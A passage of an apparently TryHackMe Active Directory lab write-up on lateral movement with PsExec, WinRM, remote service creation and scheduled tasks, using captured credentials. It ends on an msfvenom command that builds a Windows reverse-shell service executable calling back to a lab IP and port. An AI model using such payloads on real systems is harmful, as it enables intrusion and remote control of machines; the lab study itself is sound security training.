gremlin-0x/writeups/thm_activedirectory/README.md

 Attackers use __PsExec__, __WinRM__, __remote service creation__, and __scheduled tasks__ to execute commands remotely. __WinRM__ is stealthier than __PsExec__ but still logs activity. `sc.exe` (__remote service creation__) and `schtasks.exe` (__scheduled tasks__) are great for persistence.
 Defenders should monitor logs, restrict remote execution, and disable unnecessary services.

 Now let's follow the steps.
 We have some credentials captured and are trying to move to a different machine from this Jump Box with these credentials.
-The room informs that all four methods mentioned above should work against this specified machine, which is why we will try all of them.
 Let's start with `sc.exe` or remote service creation method:

 ```shell
 msfvenom -p windows/shell/reverse_tcp -f exe-service LHOST=10.50.65.56 LPORT=9233 -o sc_myservice.exe